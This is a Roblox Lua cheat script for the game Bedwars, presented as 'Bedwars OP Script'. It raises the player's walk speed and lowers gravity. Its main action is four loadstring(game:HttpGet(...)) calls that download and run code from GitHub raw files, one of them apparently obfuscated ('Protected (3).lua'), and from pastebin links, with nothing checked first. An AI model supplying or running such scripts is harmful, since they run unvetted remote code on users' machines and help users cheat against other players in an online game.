pcall(loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/RiseForRoblox/main/main.lua"))())
wait(3)
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 23
game.Workspace.Gravity = 60 
game.StarterGui:SetCore("SendNotification",{   Title =
"Bedwars OP Script";   Text = "Made By Elmo Gaming"; ---what the text says ofc
Duration = 1;})wait(1)
loadstring(game:HttpGet(('https://raw.githubusercontent.com/manimcool21/Keyboard-FE/main/Protected%20(3).lua'),true))() 
wait(2)
loadstring(game:HttpGet("https://pastebin.com/raw/MtiaKuzF"))()
wait(2)
loadstring(game:HttpGet("https://pastebin.com/raw/tC6LwQhR"))()
